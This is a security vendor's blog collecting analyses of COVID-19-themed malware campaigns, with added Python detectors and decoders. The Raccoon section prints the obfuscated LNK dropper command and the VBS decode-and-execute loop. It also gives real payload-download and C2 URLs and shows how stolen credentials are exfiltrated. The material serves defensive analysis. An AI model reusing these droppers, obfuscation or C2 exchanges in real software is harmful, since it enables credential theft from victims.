COVID-19 Ongoing Cyber Updates

Cyberint research team closely monitors threats related to COVID-19, leveraging the global fear and uncertainty around it.

Utilizing thematic lures, a variety of cyberattacks have been launched during a time when many are seeking critical information on the outbreak. Exploiting the headline-dominating crisis, individuals, organizations and governments alike are tricked into opening malicious payloads, visiting malicious websites and are subject to misinformation or fraud. Increased remote working patterns, especially for those not accustomed, can lead to increased cyberthreat exposure.

This blog post serves as a collection of threats our research team detects as the COVID-19 crisis unfolds.




COVID-19 Threat Landscape Summary

April 13, 2020

Overview

Cyberint research team is actively tracking the surge in COVID-19 related attacks since January 2020.

Threat actors have been capitalizing on the global attention surrounding the COVID-19 pandemic to launch phishing campaigns designed to spread malware to unsuspecting users and organizations. The Cyberint research team has published numerous reports and blog posts describing these campaigns and the various malware families they distribute.

Both eCrime and nation-state threat actors are leveraging COVID-19 to launch campaigns, primarily using email phishing as the initial attack vector. We have mapped the TTPs of the observed malware families to more than 90 MITRE ATT&CK tactics and techniques. Some of the most prevalent malware families used by threat actors in these campaigns include AgentTesla, AZORult, Remcos, Ryuk, CoronaVirus Ransomware, Emotet, NanoCore, AsyncRAT, LokiBot, GuLoader, and more.

Additionally, some of the most targeted countries include USA, UK, Germany, Italy, South Korea, and France.

Details

The first COVID-19 related phishing campaign we observed appeared some weeks after China's public announcement of the previously unknown COVID-19 outbreak in the city of Wuhan; since then we have observed a massive uptake in COVID-19 related attacks from both eCrime and nation-state threat actors.

Figure 1 - COVID-19 Attacks Graph Trend

The chart above shows the increasing trend in COVID-19 related attacks observed since December 2019 and the continued uptake in the following months.

Figure 2 - Most Prevalent Malware Related to COVID-19

 

COVID-19 Campaigns Observed During January 2020

In early January 2020, we observed a phishing campaign leveraging COVID-19 themed macro-enabled Excel attachments. The campaign is attributed to TA505, one of the most active eCrime groups today, which primarily targets the financial and retail sectors.

Figure 3 - Malicious Excel sheet sent as an attachment by TA505

The macro-enabled Excel sheet contains an embedded executable that is dropped to disk and loaded into memory. The embedded executable is a CobaltStrike beacon DLL loader; once loaded, it enumerates running processes and beacons to its C2 at the following URL: https://dysoool[.]com/casemd

This example shows how TA505 immediately shifted focus from their normal operations using generic financial lures and started to leverage COVID-19 global focus to launch their campaigns.

MITRE ATT&CK Techniques Mapping

Technique                                   | Tactic
Spearphishing Attachment - T1193            | Initial Access
Scripting - T1064                           | Defense Evasion, Execution
Process Discovery - T1057                   | Discovery
File and Directory Discovery - T1083        | Discovery
Standard Application Layer Protocol - T1071 | Command and Control
Standard Cryptographic Protocol - T1032     | Command and Control

Download COVID-19 Threat Landscape Summary Report

The full report includes the following chapters:

  • COVID-19 Campaigns Observed During February 2020
  • COVID-19 Campaigns Observed During March 2020
  • Defending COVID-19 Related Attacks

HHS Website Redirecting to Malicious Files

Mar. 25, 2020


On March 23rd Cyberint research team discovered that the US Health and Human Services (HHS) website (hhs.gov) was redirecting to a malicious infrastructure. 

This infrastructure delivers an information stealer known as Raccoon, which is sold as a service on underground marketplaces for as little as $75 per month. Raccoon provides a rich feature set, stealing login credentials, credit card information, cryptocurrency wallets and browser data from more than 60 different applications.


Cyberint’s initial analysis showed the malware collects the following information from the infected machines:

  • General system information
  • Installed browser passwords
  • Email login credentials
  • Browser saved URLs
  • Cookie information

Cyberint Research executed a detailed in-depth analysis of this issue that you can see below.


Technical Analysis

The infection chain begins from the following URL

https://dcis.hhs.gov/cas/login?service=http%3A%2F%2F195.130.73.229/php/hhs/&gateway=true


The 195.130.73.229/php/hhs URL hosts a Zip archive named document.zip.

File name: document.zip

SHA256: 41A857F3EA7ECBEEEF165F6EAC07606DCD8DFE12821CF4012029025496787129

File Size: 4505 bytes

Tags: Archive, Malware

This archive contains a Windows LNK file (coronavirus.doc.lnk) masquerading as an MS Office Word document.

File name: coronavirus.doc.lnk

SHA256: 2414e2fd46a354ccdcf2adeb6fcb838ed5a47b11572571e2e35e4613fe5b2a88

File Size: 18501 bytes

Tags: Dropper, lnk

The LNK file executes embedded JS code that extracts and drops a VBS file to disk.

Strings extracted from coronavirus.doc.lnk (the embedded obfuscated VBS payload, which is the same script dropped as TynhV.vbs below, is abbreviated here):

  C:\Windows\System32\cmd.exe
  %comspec%
  desktop-1eq1o8l
  coronavirus.doc$..\..\..\..\Windows\System32\cmd.exe
  /v:on /c del qyhRR & if not exist csnJs.txt (set "DJoLj=n" & set "VVdEg=s") & fi!DJoLj!d!VVdEg!tr "HPnVS.*" coronavirus.doc.l!DJoLj!k > "%tmp%\TynhV.vb!VVdEg!" & "%tmp%\TynhV.vb!VVdEg!" & LHumK!%SystemRoot%\system32\SHELL32.dll
  HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI = array( [integer array omitted] ) ... : next : eval("execute(vnheRuqpQteHohlGdauOFDH)")
  S-1-5-21-2757954604-340118960-1547191765-1001


The JS script contains an encoded byte array and, when executed, drops a VBS script named TynhV.vbs to the %temp% directory.
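The cmd.exe command line carried by the LNK (see the strings above) never contains the literal words findstr or .vbs: it enables delayed expansion with /v:on, stores n and s in two variables, and assembles fi!DJoLj!d!VVdEg!tr at run time to carve the VBS text out of the .lnk file itself. The following is an added detection example, not code from the original analysis: it resolves the !var! tokens the way cmd.exe would and then flags a findstr that reads a .lnk file and redirects its output into a script that is subsequently executed. The sample command lines are constructed (the first is the page's command line with a cmd.exe prefix added; the others are benign look-alikes).

```python
import re
from typing import List, Optional

# Constructed process-creation command lines, as an EDR or Sysmon Event ID 1 would
# record them. The first is the cmd.exe line carried by coronavirus.doc.lnk (as
# analysed above) with a "cmd.exe" prefix added; the rest are benign look-alikes.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /v:on /c del qyhRR & if not exist csnJs.txt (set "DJoLj=n" & set "VVdEg=s") '
    r'& fi!DJoLj!d!VVdEg!tr "HPnVS.*" coronavirus.doc.l!DJoLj!k > "%tmp%\TynhV.vb!VVdEg!" '
    r'& "%tmp%\TynhV.vb!VVdEg!" & LHumK!%SystemRoot%\system32\SHELL32.dll',
    r'cmd.exe /c findstr /i "error" C:\logs\app.log > C:\logs\errors.txt',
    r'cmd.exe /v:on /c set "X=1" & echo !X!',
    r'"C:\Program Files\7-Zip\7z.exe" x C:\Users\me\Downloads\report.zip',
]

# In-line `set "NAME=value"` statements and the `!NAME!` tokens they feed.
SET_RE = re.compile(r'\bset\s+"?([A-Za-z_][A-Za-z0-9_]*)=([^"&]*)"?', re.IGNORECASE)
TOKEN_RE = re.compile(r'!([A-Za-z_][A-Za-z0-9_]*)!')

# findstr reading a .lnk file and redirecting the match into a script file.
SELF_EXTRACT_RE = re.compile(
    r'findstr\b[^&|>]*\.lnk\b[^&|>]*>\s*"?'
    r'([^"&|>]+?\.(?:vbs|vbe|js|jse|wsf|hta|bat|cmd|ps1))(?=["\s&|]|$)',
    re.IGNORECASE)


def expand_delayed(cmdline: str) -> str:
    """Resolve cmd.exe delayed-expansion tokens (!NAME!) using the set statements
    found on the same command line. Only this simple single-line form is handled;
    tokens without a matching set are left untouched."""
    env = {name.lower(): value for name, value in SET_RE.findall(cmdline)}
    return TOKEN_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), cmdline)


def detect_lnk_self_extract(cmdline: str) -> Optional[dict]:
    """Return details if the (expanded) command line carves a script out of a
    .lnk file with findstr, None otherwise."""
    expanded = expand_delayed(cmdline)
    m = SELF_EXTRACT_RE.search(expanded)
    if not m:
        return None
    dropped = m.group(1)
    return {
        "dropped_script": dropped,
        # the dropped path appearing a second time after the redirect means it is run
        "executed_after_drop": expanded.lower().count(dropped.lower()) >= 2,
        "obfuscated_by_delayed_expansion": expanded != cmdline,
        "expanded": expanded,
    }


def scan(command_lines: List[str]) -> List[int]:
    """Indexes of the command lines that match the LNK self-extraction pattern."""
    return [i for i, c in enumerate(command_lines) if detect_lnk_self_extract(c)]


if __name__ == "__main__":
    for i in scan(SAMPLE_COMMAND_LINES):
        print(i, detect_lnk_self_extract(SAMPLE_COMMAND_LINES[i]))
```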

File name: TynhV.vbs

SHA256: DF41D7733025128357571FC1C1166F696E83E06EEB39CE6C828031B1994DB957

File Size: 16343 bytes

Tags: Downloader, VBS


HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI = array( [first integer array omitted] )
OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv = array( [second integer array omitted] )
for naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp = lbound(HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI) to ubound(OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv)
    CPPFTOKSLLcZgwVEXzmeCFEkBmwCaySWTjRG = sqr(HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI(naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp)) - sqr(OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv(naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp))
    KlsQfgUMVZHRTgtooKZmlxoHqzOtZcsAJjEGgc = chr(CPPFTOKSLLcZgwVEXzmeCFEkBmwCaySWTjRG)
    vnheRuqpQteHohlGdauOFDH = vnheRuqpQteHohlGdauOFDH & KlsQfgUMVZHRTgtooKZmlxoHqzOtZcsAJjEGgc
next
eval("execute(vnheRuqpQteHohlGdauOFDH)")


TynhV.vbs is heavily obfuscated and contains two integer arrays. The decoding routine at the end of the script takes the square root of each element of the first array, subtracts the square root of the corresponding element of the second array, converts the difference to a character with chr(), and passes the concatenated result to execute; the decoded code retrieves the payload from the following URL:

http://185.62.188.204/hunt/post/corona.exe
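The following is an added example, not code from the original analysis: it reproduces the sqr-difference decode loop of TynhV.vbs in Python, refuses input that is not made of perfect squares (a truncated or mismatched array pair), and extracts the arrays and their order directly from script text using the sqr(X(i)) - sqr(Y(i)) expression. The first nine elements of each array in TynhV.vbs are used as a test vector (they decode to "on error "); the variable names xA/xB and the sample script are constructed.

```python
import math
import re
from typing import Dict, List, Tuple

# First nine elements of each array in TynhV.vbs as analysed above; the rest of
# the arrays are omitted. This prefix decodes to "on error ".
PAGE_ARRAY_A_PREFIX = [82369, 83521, 41616, 77284, 84681, 82944, 81796, 84100, 44521]
PAGE_ARRAY_B_PREFIX = [30976, 32041, 29584, 31329, 31329, 30276, 30625, 30976, 32041]


def decode_sqr_pairs(minuend: List[int], subtrahend: List[int]) -> str:
    """Replicate the VBS loop: chr(sqr(minuend(i)) - sqr(subtrahend(i))).
    Every element must be a perfect square; anything else means the two arrays
    are not a matching pair (or one of them is truncated)."""
    chars = []
    for i, (a, b) in enumerate(zip(minuend, subtrahend)):
        ra, rb = math.isqrt(a), math.isqrt(b)
        if ra * ra != a or rb * rb != b:
            raise ValueError(f"element {i} is not a perfect square ({a}, {b})")
        code = ra - rb
        if not 0 <= code < 0x110000:
            raise ValueError(f"element {i} decodes outside chr() range ({code})")
        chars.append(chr(code))
    return "".join(chars)


# NAME = array(n, n, ...) literals and the sqr(X(i)) - sqr(Y(i)) expression.
ARRAY_RE = re.compile(r'(\w+)\s*=\s*array\(\s*([\d\s,]+?)\s*\)', re.IGNORECASE)
PAIR_RE = re.compile(r'sqr\((\w+)\(\w+\)\)\s*-\s*sqr\((\w+)\(\w+\)\)', re.IGNORECASE)


def decode_vbs_text(vbs_text: str) -> str:
    """Pull every array literal out of the script, learn from the decode loop
    which array is subtracted from which, and decode."""
    arrays: Dict[str, List[int]] = {
        name: [int(n) for n in nums.split(",") if n.strip()]
        for name, nums in ARRAY_RE.findall(vbs_text)
    }
    m = PAIR_RE.search(vbs_text)
    if not m:
        raise ValueError("sqr-difference decode loop not found")
    x, y = m.group(1), m.group(2)
    if x not in arrays or y not in arrays:
        raise ValueError(f"decode loop references unknown array(s): {x}, {y}")
    return decode_sqr_pairs(arrays[x], arrays[y])


def encode_sqr_pairs(text: str, base: int = 170) -> Tuple[List[int], List[int]]:
    """Inverse of the scheme, used only to construct a test script below
    (the subtrahend roots are arbitrary)."""
    minuend, subtrahend = [], []
    for k, ch in enumerate(text):
        rb = base + (k * 7) % 11
        ra = rb + ord(ch)
        minuend.append(ra * ra)
        subtrahend.append(rb * rb)
    return minuend, subtrahend


def build_sample_vbs(script: str) -> str:
    """Constructed stand-in for TynhV.vbs with short variable names."""
    a, b = encode_sqr_pairs(script)
    return (f"xA = array({', '.join(map(str, a))}) : "
            f"xB = array({', '.join(map(str, b))}) : "
            "for i = lbound(xA) to ubound(xB) : c = sqr(xA(i)) - sqr(xB(i)) : "
            "s = s & chr(c) : next : eval(\"execute(s)\")")


if __name__ == "__main__":
    print(repr(decode_sqr_pairs(PAGE_ARRAY_A_PREFIX, PAGE_ARRAY_B_PREFIX)))
    print(decode_vbs_text(build_sample_vbs('WScript.Echo "decoded"')))
```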


corona.exe is a Raccoon payload executed from the %temp% directory.

The payload drops another file called svchost.exe in the same directory; this svchost.exe is a legitimate, Microsoft-signed copy of vbc.exe. The Raccoon payload starts svchost.exe in a suspended state, injects code into it, and resumes execution.


File name: corona.exe

SHA256: 417871EE18A4C782DF7AE9B7A64CA060547F7C88A4A405B2FA2487940EAA3C31

File Size: 734208 bytes

Tags: Dropper, Raccoon

File name: svhost.exe

SHA256: D4CB7377E8275ED47E499AB0D7EE47167829A5931BA41AA5790593595A7E1061

File Size: 2688096 bytes

Tags: Injected, Raccoon, Signed

The injected svchost.exe process then contacts its C2 at the following URL using an HTTP POST request with base64-encoded parameters:

http://35.228.60.178/gate/log.php

The decoded value of the parameters is:

bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin&config_id=1100ffd1149d14257ac9c4b7df1ceb7c1777d166&data=null


bot_id is the infected machine's GUID; config_id is the configuration ID for the malware.

The received response is in the following JSON format:

{"url":"http://35.228.60.178/file_handler/file.php?hash=ada9815aff61f6145a584e38e724a70ac4ac967c&js=8eef2fb5d253751408287c2add27cfc10dc2821a&callback=http://35.228.60.178/gate","attachment_url":"http://35.228.60.178/gate/sqlite3.dll","libraries":"http://35.228.60.178/gate/libs.zip","ip":"185.183.107.236","config":{"masks":null,"loader_urls":null},"is_screen_enabled":0,"is_history_enabled":0,"depth":3}


That JSON contains the information the malware needs to execute its tasks.

The malware downloads legitimate files from the C2 server, such as sqlite3.dll, and libs.zip containing further auxiliary files that the malware uses to steal information from the infected machine.

The malware then collects the following information from the infected machine

  • General system information
  • Installed browser passwords
  • Email login information
  • Browser saved URLs
  • Cookie information

Raccoon then exfiltrates the information using a POST request to the following URL:

http://35.228.60.178/file_handler/file.php?hash=ada9815aff61f6145a584e38e724a70ac4ac967c&js=8eef2fb5d253751408287c2add27cfc10dc2821a&callback=http://35.228.60.178/gate

The body posted to file.php is an archive containing the above-mentioned data collected by Raccoon, which is thereby sent back to its C2 server.

--Jfbvjwj3489078yuyetu

content-disposition: form-data; name="file"; filename="data.zip"

Content-Type: application/octet-stream

[binary Zip payload omitted; the archive entries visible in the dump are passwords.txt, browsers/firefox_urls.txt, browsers/chrome_autofill.txt, mails/outlook.txt, System Info.txt and browsers/cookies/Firefox_qldyz51w.default.txt]

--Jfbvjwj3489078yuyetu--


We can clearly see the PK header and files such as passwords.txt and System Info.txt in the archive.
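The three messages of the Raccoon exchange above (base64 check-in to log.php, JSON task response, multipart upload of data.zip to file.php) are the artefacts an analyst gets from a proxy or PCAP. The following is an added example, not code from the original analysis: it decodes the check-in body, pulls every URL and enabled module out of the task response (including the callback= URL hidden in the exfil URL's query string), and checks that a multipart upload really carries a Zip archive. The check-in plaintext and JSON response are the values shown on this page; the base64 body and the upload (with a harmless in-memory archive in place of stolen data) are constructed.

```python
import base64
import io
import json
import re
import zipfile
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Check-in parameters as decoded on this page, re-encoded here to model the
# base64 body the bot posts to /gate/log.php.
CHECKIN_PLAINTEXT = ("bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin"
                     "&config_id=1100ffd1149d14257ac9c4b7df1ceb7c1777d166&data=null")
CHECKIN_BODY_B64 = base64.b64encode(CHECKIN_PLAINTEXT.encode()).decode()

# The C2 JSON response exactly as shown on this page.
C2_RESPONSE = (
    '{"url":"http://35.228.60.178/file_handler/file.php?hash=ada9815aff61f6145a584e38e724a70ac4ac967c'
    '&js=8eef2fb5d253751408287c2add27cfc10dc2821a&callback=http://35.228.60.178/gate",'
    '"attachment_url":"http://35.228.60.178/gate/sqlite3.dll",'
    '"libraries":"http://35.228.60.178/gate/libs.zip","ip":"185.183.107.236",'
    '"config":{"masks":null,"loader_urls":null},"is_screen_enabled":0,'
    '"is_history_enabled":0,"depth":3}')


def parse_checkin(body_b64: str) -> Dict[str, str]:
    """Decode the base64 POST body and split bot_id into machine GUID and user name."""
    plain = base64.b64decode(body_b64, validate=True).decode("ascii", errors="replace")
    fields = {k: v[0] for k, v in parse_qs(plain, keep_blank_values=True).items()}
    if "bot_id" not in fields or "config_id" not in fields:
        raise ValueError("bot_id/config_id missing: not a Raccoon-style check-in")
    guid, _, user = fields["bot_id"].partition("_")
    return {"machine_guid": guid, "user": user,
            "config_id": fields["config_id"], "data": fields.get("data", "")}


def parse_c2_response(raw: str) -> dict:
    """Collect every URL the response tells the bot to use (including the callback=
    URL embedded in the exfil URL's query string) and the enabled modules."""
    doc = json.loads(raw)
    urls: List[str] = [doc[k] for k in ("url", "attachment_url", "libraries") if doc.get(k)]
    for u in list(urls):
        urls.extend(parse_qs(urlsplit(u).query).get("callback", []))
    return {"urls": urls,
            "hosts": sorted({urlsplit(u).hostname for u in urls}),
            "screen_capture": bool(doc.get("is_screen_enabled")),
            "browser_history": bool(doc.get("is_history_enabled")),
            "victim_ip": doc.get("ip")}


FILENAME_RE = re.compile(rb'content-disposition:\s*form-data;[^\r\n]*filename="([^"]+)"',
                         re.IGNORECASE)


def parse_exfil_upload(body: bytes) -> dict:
    """Inspect a multipart upload: boundary, uploaded filename, and whether the
    part payload starts with a Zip local file header (PK 03 04), as the
    data.zip exfil on this page does."""
    first_line, _, rest = body.partition(b"\r\n")
    if not first_line.startswith(b"--"):
        raise ValueError("multipart body must start with a boundary line")
    boundary = first_line[2:]
    headers, _, payload = rest.partition(b"\r\n\r\n")
    payload = payload.split(b"\r\n--" + boundary, 1)[0]
    m = FILENAME_RE.search(headers)
    return {"boundary": boundary.decode(), "filename": m.group(1).decode() if m else None,
            "is_zip": payload.startswith(b"PK\x03\x04"), "payload_size": len(payload)}


def build_sample_upload() -> bytes:
    """Constructed exfil request using the page's boundary and filename and a
    harmless in-memory archive in place of the stolen data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("passwords.txt", "constructed sample, no real data\n")
    return (b"--Jfbvjwj3489078yuyetu\r\n"
            b'content-disposition: form-data; name="file"; filename="data.zip"\r\n'
            b"Content-Type: application/octet-stream\r\n\r\n" + buf.getvalue() +
            b"\r\n--Jfbvjwj3489078yuyetu--\r\n")


if __name__ == "__main__":
    print(parse_checkin(CHECKIN_BODY_B64))
    print(parse_c2_response(C2_RESPONSE))
    print(parse_exfil_upload(build_sample_upload()))
```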


MITRE ATT&CK™ Mapping

Technique                                   | Tactic                                | Description
T1106 - Execution through API               | Execution                             | chrom.exe - Application launched itself
T1064 - Scripting                           | Defense Evasion, Execution            | cmd.exe - Executes scripts
T1204 - User Execution                      | Execution                             | cmd.exe - Manual execution by user
T1129 - Execution through Module Load       | Execution                             | svhost.exe - Loads dropped or rewritten executable
T1081 - Credentials in Files                | Credential Access                     | svhost.exe - Actions look like stealing of personal data; stealing of credential data
T1003 - Credential Dumping                  | Collection                            | svhost.exe - Reads the cookies of Mozilla Firefox and Google Chrome
T1012 - Query Registry                      | Discovery                             | svhost.exe - Searches for installed software and reads Internet Cache Settings
T1114 - Email Collection                    | Collection                            | svhost.exe - Stealing of credential data
T1105 - Remote File Copy                    | Command And Control, Lateral Movement | svchost.exe - Downloads and uploads files from remote machine
T1071 - Standard Application Layer Protocol | Command And Control                   | svchost.exe - Communicates over ports 80 and 443
T1032 - Standard Cryptographic Protocol     | Command And Control                   | svchost.exe - Uses standard SSL cryptography
T1217 - Browser Bookmark Discovery          | Discovery                             | svchost.exe - Reads sensitive browser data


Indicators of Compromise (IOCs)


TA505 Leverages the Crisis to Drop CobaltStrike

Mar. 24, 2020

Cyberint Research recently discovered activity we attribute to TA505 that uses the COVID-19 global pandemic as a lure. TA505 uses macro-enabled Excel documents to drop a CobaltStrike beacon onto the victim machine.

File name: COVID-19-FAQ.xls

SHA256: 13ec756ae8468f693cdd7e591108cbc0981ce11fe0e251cd7b9fb6c2db8fe34b

File Size: 948736 bytes

Tags: Excel, Macro-Enabled, Maldoc

File name: reinforce.dll

SHA256: 4178496e803a5651beabbb5736857d03293065b1d1e4dfeec4508960ff582f53

File Size: 293376 bytes

Tags: Beacon, CobaltStrike

The COVID-19-FAQ.xls file contains an embedded OLE object. This object contains a DLL file that is extracted and saved under:

%AppData%\Roaming\Microsoft\Windows\Templates\reinforce.dll

The DLL is a custom packed loader that loads the CobaltStrike Beacon using the VirtualAlloc and VirtualProtect API calls to allocate memory within the loader's address space and load the beacon payload into memory.

The beacon then communicates with its C2 using the following URLs

https://dysoool.com/casemd

http://dysoool.com/casemd

C2 was down at the time of analysis.

MITRE ATT&CK™ Mapping

Technique                             | Tactic    | Description
T1129 - Execution through Module Load | Execution | Excel.exe - Loads dropped or rewritten executable
T1204 - User Execution                | Execution | User interactively opens COVID-19-FAQ.xls
T1012 - Query Registry                | Discovery | Excel.exe - Reads Microsoft Office registry keys
T1106 - Execution through API         | Execution | reinforce.dll - Allocates and loads code to memory using VirtualAlloc and VirtualProtect
T1129 - Execution through Module Load | Execution | Excel.exe - Drops reinforce.dll to disk and loads it to memory

LokiBot using COVID-19 thematic lures

Mar. 23, 2020

The well-utilized and documented LokiBot, also known as Loki, Loki Password Stealer and LokiPWS, is a commodity information stealer that has previously been sold on various underground forums and marketplaces, and has also had its code leaked. Given the availability of LokiBot, many lower-sophistication threat actors use it in widespread, indiscriminate campaigns, and it is therefore unsurprising that recent campaigns are using COVID-19 thematic lures.

 

Cyberint's Threat Intelligence Suite recently detected a new malicious email campaign (Figure 1) attempting to masquerade as being sent from a government health authority, the seemingly fictitious 'Center for Disease Control & Management' rather than perhaps the US Centers for Disease Control and Prevention (CDC).


Figure 1 - Recent LokiBot email lure

Sent to organizations in at least Germany and Romania, including a pharmaceutical company, the campaign includes a malicious Zip compressed attachment that drops the LokiBot stealer onto the victim's machine.

As is de rigueur for email lures of this nature, the message conveys urgency and importance to the recipient, encouraging them to open the attachment to view content purportedly from the World Health Organization (WHO) related to the COVID-19 situation.

As seen in other recent campaigns, whilst the file attachment has an 'arj' file extension, typically assigned to files compressed using the ARJ archiver, the file is actually a Zip compressed archive, as confirmed by the file header (Figure 2).


Figure 2 - Attachment 'Zip' file header

The use of a file extension that does not correspond to the actual file type may be an attempt to evade low-sophistication countermeasures such as restrictions based on the file extension alone. Furthermore, whilst Windows does not natively support ARJ compressed files, common compression applications such as 7zip, WinRAR and WinZIP often process archives based on their file header regardless of the file extension, and would therefore decompress the file if it were opened.
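The header-based check described above, as an added example that is not code from the original post: it classifies an attachment by its leading bytes rather than its extension, flags an 'arj' name on a Zip archive, and lists Zip members whose name mimics a document while carrying an executable extension. The magic-byte table and the in-memory sample archive (a text note with the campaign's '_pdf.exe' file name) are constructed for the example.

```python
import io
import re
import zipfile

# Leading bytes of the archive formats mentioned on this page (constructed table).
ARCHIVE_MAGIC = {
    "zip": (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"),
    "arj": (b"\x60\xea",),
    "rar": (b"Rar!\x1a\x07",),
    "7z": (b"7z\xbc\xaf\x27\x1c",),
    "cab": (b"MSCF",),
}
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "lnk"}
# '..._pdf.exe', 'report.doc.exe' and similar: a document hint right before the real extension
DOC_DISGUISE = re.compile(r"[._ -](pdf|docx?|xlsx?|pptx?)$", re.I)


def sniff_archive(data: bytes):
    """Archive type by header bytes, or None when no known header is present."""
    for fmt, magics in ARCHIVE_MAGIC.items():
        if data.startswith(magics):
            return fmt
    return None


def file_extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def disguised_executables(zip_bytes: bytes) -> list[str]:
    """Zip members with an executable extension whose name pretends to be a document."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ext = file_extension(info.filename)
            stem = info.filename[: -(len(ext) + 1)] if ext else info.filename
            if ext in EXECUTABLE_EXT and DOC_DISGUISE.search(stem):
                found.append(info.filename)
    return found


def check_attachment(filename: str, data: bytes) -> dict:
    """Compare the type claimed by the extension with the type the header reveals."""
    actual = sniff_archive(data)
    claimed = file_extension(filename)
    verdict = {
        "filename": filename,
        "claimed": claimed,
        "actual": actual,
        "mismatch": actual is not None and actual != claimed,
        "disguised_members": [],
    }
    if actual == "zip":
        verdict["disguised_members"] = disguised_executables(data)
    return verdict


def build_sample_lure() -> bytes:
    """Constructed sample: a Zip whose only member is a text note carrying the
    campaign's '_pdf.exe' file name (no real executable is involved)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe",
                    "placeholder text, not a binary")
    return buf.getvalue()


if __name__ == "__main__":
    print(check_attachment("AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_zip.arj",
                           build_sample_lure()))
```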

Initial Payload

Once decompressed, the archive contains a compiled AutoIt script named 'AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe' that mimics an Adobe PDF file to encourage the recipient to open it.

Decompiling the AutoIt payload reveals a script that appears to have used obfuscation techniques (Figure 3) to mask its operations including the use of randomly named variables, a string reversal function and the built in 'BinaryToString' function.


Figure 3 - Decompiled AutoIt Script with obfuscation

LokiBot Payload

Encoded and also stored in reverse, a shellcode payload is present within the compiled AutoIt script (Figure 4) ready for injection into another process.


Figure 4 - Shellcode Payload

In this instance, the code is injected into the Windows 'COM Surrogate' process, 'dllhost.exe', and calls home to the LokiBot command and control (C2) server.

Command and Control

As is often the case with LokiBot, and other 'stealer' malware, the command and control (C2) infrastructure is installed on a compromised webserver.

Commencing with a 'call home' operation, the LokiBot payload sends a HTTP POST to the common LokiBot page 'fre.php' along with details of the compromised host such as user and device information (Figure 5).


Figure 5 - Call home 'HTTP POST'

Aside from compromised hosts communicating with the common C2 page 'fre.php', the seemingly fixed user-agent string 'Mozilla/4.08 (Charon; Inferno)' may serve as a useful indicator of compromise when reviewing network access logs.

Analysis of this compromised host confirms the presence of a LokiBot control panel and administrative interface accessible via the page '/PvqDq929BSx_A_D_M1n_a.php' (Figure 6).


Figure 6 - LokiBot Admin Interface
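An added example, not from the original analysis, that hunts for the indicators discussed above (the fixed user-agent, POSTs to the call-home page 'fre.php' and requests to the admin page) in web proxy access logs. The combined log format is an assumption, the log lines are constructed, and the host c2.example.invalid stands in for the real C2 domain.

```python
import re

# Apache/NGINX "combined" format; assumed here as the proxy's export format.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators from the analysis above.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
CALL_HOME_PAGE = re.compile(r"/fre\.php$", re.I)
ADMIN_PAGE = re.compile(r"/PvqDq929BSx_A_D_M1n_a\.php$", re.I)


def parse_combined(line: str):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def lokibot_reasons(entry: dict) -> list[str]:
    """Which LokiBot indicators a single request matches (empty list = none)."""
    reasons = []
    path = entry["url"].split("?", 1)[0]
    if entry["ua"] == LOKIBOT_UA:
        reasons.append("fixed LokiBot user-agent")
    if entry["method"] == "POST" and CALL_HOME_PAGE.search(path):
        reasons.append("POST to call-home page fre.php")
    if ADMIN_PAGE.search(path):
        reasons.append("request to LokiBot admin interface")
    return reasons


def hunt(lines):
    """(client, url, reasons) for every parsable line that matches an indicator."""
    hits = []
    for line in lines:
        entry = parse_combined(line.strip())
        if entry and (reasons := lokibot_reasons(entry)):
            hits.append((entry["client"], entry["url"], reasons))
    return hits


# Constructed sample log; two infected-looking clients, one normal browser, one script.
SAMPLE_LOG = """\
10.1.2.3 - - [23/Mar/2020:09:14:02 +0000] "POST http://c2.example.invalid/alhaji/Panel/five/fre.php HTTP/1.1" 404 0 "-" "Mozilla/4.08 (Charon; Inferno)"
10.1.2.9 - - [23/Mar/2020:09:15:11 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.1.2.3 - - [23/Mar/2020:09:16:45 +0000] "POST http://c2.example.invalid/alhaji/Panel/five/fre.php HTTP/1.1" 404 0 "-" "Mozilla/4.08 (Charon; Inferno)"
10.1.2.7 - - [23/Mar/2020:09:17:00 +0000] "POST http://intranet.example.com/upload/fre.php HTTP/1.1" 200 12 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for client, url, reasons in hunt(SAMPLE_LOG.splitlines()):
        print(client, url, "; ".join(reasons))
```

A request that matches both the user-agent and the call-home page is a far stronger signal than a lone POST to a page named fre.php, which the last sample line shows as a weaker, single-reason hit.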

Password Stealer

Consistent with other versions of LokiBot, this campaign attempts to access credential-related data for a number of file transfer clients, email clients and web browsers.

